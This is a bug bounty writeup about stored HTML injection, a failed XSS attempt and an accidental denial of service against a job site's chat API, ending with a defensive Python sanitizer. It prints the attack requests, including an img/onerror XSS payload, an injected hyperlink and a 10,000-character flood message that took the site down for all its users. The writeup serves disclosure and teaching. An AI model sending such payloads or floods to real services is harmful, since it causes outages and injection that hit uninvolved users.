DOS & Stored HTML Injection Bug Bounty Writeup
What will be covered in today's blog?
DOS attack and its effect
A bit about the target
How I found the bugs
- A DOS (Denial of Service) is an attack meant to take down a target's website, network, etc. It happens by the attacker sending large amounts of traffic or data; for example, me sending a query of 'query 123' 5000 times in one request may cause a crash because of the amount of data being handled at once.
- The target had over 500,000 active users; the image below just shows the login page, a clean basic UI. The company let you search for jobs and had over 2 million applications made. With that said, the first bit of functionality was creating a profile. I registered a user, which took a while as I had to choose my talents, fill in addresses, what jobs I am looking for, etc.
- As seen above there is a search option to message a friend/anyone else, with information such as a username, title and body (on their account), which I thought was a weird feature for a website that lets you search for jobs and apply, but I also thought it was a good place to test for bugs.
- Before a deep dive into the chat functionality I did check for CSRF, but they did have CSRF tokens and CFUID. So I decided to look into the chat functionality and see what kind of bugs I could find. At first I tried XSS (Cross Site Scripting); the request shown below shows me capturing the request in Burp and trying an XSS payload.
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token: X-CSRF Token value
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cookies
Connection: close

chat_message%5Bbody%5D=%22%3E%3Cimg+src+onerror%3Dalert(1)%3E%0A
- The request above shows the payload URL-encoded. Decoding the URL-encoded values we have an "img" tag, which is normally used to load an image, with a "src" attribute that was left blank (nothing) and an "onerror" event handler. Because there is no image "src" (or an invalid "src"), the "onerror" event handler is triggered, and it contains an alert as its method.
- The screenshot below shows a stripped version of our payload, indicating there is some sort of client-side sanitization preventing us from using the payload shown above; this shows security measures were in place for the chat functionality.
- Moving on to attempting HTML Injection in the chat application, I first tried to create some hyperlinks. If you don't understand the following, please read my previous blog on HTML Injection: blog.riotsecurityteam.com/deep-dive-into-ht..
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token: X-CSRF-Token
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cookies

chat_message%5Bbody%5D=%3Ca+href%3Dhttps%3A%2F%2Fwww.google.com%3EHyperlink%3C%2Fa%3E
- Decoding this URL-encoded value, we have an anchor (a) tag with an href attribute that tells the hyperlink where to go, in our case google.com; we then give it the text "Hyperlink" and close the anchor tag.
- That worked, to my surprise; I now had Stored HTML Injection in the chat functionality. I decided to try leveraging this to XSS using the javascript:alert(1) method, but it would create the hyperlink and not execute it, which I assume was down to sanitization. As shown below, though, we did successfully create a hyperlink, indicating it is vulnerable to HTML Injection.
- My friend and I did try other methods to get XSS, but we decided to move on to attempting a DOS, so I first sent a message with around 10000 "a" characters added, as shown below.
POST /api/v1/chat_rooms/38589/reply HTTP/1.1
Host: thewebsite.com
Content-Length: 85
Accept: application/json, text/javascript, */*; q=0.01
X-CSRF-Token: X-CSRF-Token
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://www.thewebsite.com
Referer: https://www.thewebsite.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cookies

chat_message%5Bbody%5D=the query string here
- At that point it was of course lagging my own browser, and then it sent the message, but my friend and I didn't see it come through, so I sent it again and the same thing happened. We moved back to attempting XSS until, around 15 minutes after trying the DOS, I saw the message. I opened the chat I sent it in and it didn't crash, but after another 5 minutes of moving around I got a "504", indicating the server was trying to cope but couldn't, and the same happened to my friend, so our DOS succeeded. But then it turned out the whole website got taken down: I asked multiple friends to load it and they got a 500 application error/504 gateway timeout... so our DOS affected everyone. I immediately contacted the BBP and the teams to report this; it was back up within 5 hours, and since then the DOS has been fixed and I have not been able to recreate the attack, thankfully! The image below shows the attempt after the fix; it does not affect me.
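As an added defender-side example (not the author's code, and not the target's), here is a Python server-side filter for the chat_message[body] field seen in the requests above, covering all three findings: it rejects oversized messages before doing any parsing work (the DOS message), rebuilds the body from an allow-list so the img/onerror payload is dropped and the google.com hyperlink survives (the XSS and HTML Injection attempts), and strips a javascript: href. The MAX_BODY_CHARS limit, the single allowed tag and the sample bodies are assumptions constructed for this example.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

MAX_BODY_CHARS = 2000             # assumed server-side cap; the writeup's flood message carried ~10000 chars
ALLOWED_ATTRS = {"a": {"href"}}   # allow-list: only <a href="http(s)://..."> may survive, nothing else

class ChatBodySanitizer(HTMLParser):  # rebuilds a message from the allow-list and records what it dropped
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self.open_tags = [], [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_ATTRS:                   # <img>, <script>, <iframe>, ... are dropped whole
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name not in ALLOWED_ATTRS[tag]:         # catches onerror, onclick and every other on* handler
                self.dropped.append(f"{tag}@{name}")
            elif not value.lower().startswith(("http://", "https://")):
                self.dropped.append(f"href:{value}")   # javascript:, data:, vbscript: and friends
            else:
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:                      # a stray </a> with no opener is ignored
            self.out.append(f"</{self.open_tags.pop()}>")

    def handle_data(self, data):
        self.out.append(escape(data))                  # text is escaped, never trusted

def sanitize_chat_body(form_body):
    """Decode the form body, reject oversized messages before any parsing, sanitize the rest."""
    body = parse_qs(form_body).get("chat_message[body]", [""])[0]
    if len(body) > MAX_BODY_CHARS:
        return None, ["too_long"]                      # (clean_html or None, list of dropped items)
    parser = ChatBodySanitizer()
    parser.feed(body)
    parser.close()
    closers = "".join(f"</{t}>" for t in reversed(parser.open_tags))  # an unclosed <a> must not swallow the page
    return "".join(parser.out) + closers, parser.dropped

# Constructed sample bodies reproducing the three requests in the writeup.
XSS_BODY = "chat_message%5Bbody%5D=%22%3E%3Cimg+src+onerror%3Dalert(1)%3E%0A"
LINK_BODY = "chat_message%5Bbody%5D=%3Ca+href%3Dhttps%3A%2F%2Fwww.google.com%3EHyperlink%3C%2Fa%3E"
FLOOD_BODY = urlencode({"chat_message[body]": "a" * 10000})
```

Rejecting on length before parsing is the part that matters for the DOS: the cost of the request must be bounded before any rendering or storage work happens, and the dropped list gives the application something to log and alert on.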
I hope you have learnt something in this blog. I am not sure why the whole web server crashed for everyone, but I am sure there are multiple reasons. Thanks for reading, and also thank you to twitter.com/RitikSahni22 for shouting me out in his newsletter; go read some of his blogs, they're amazing!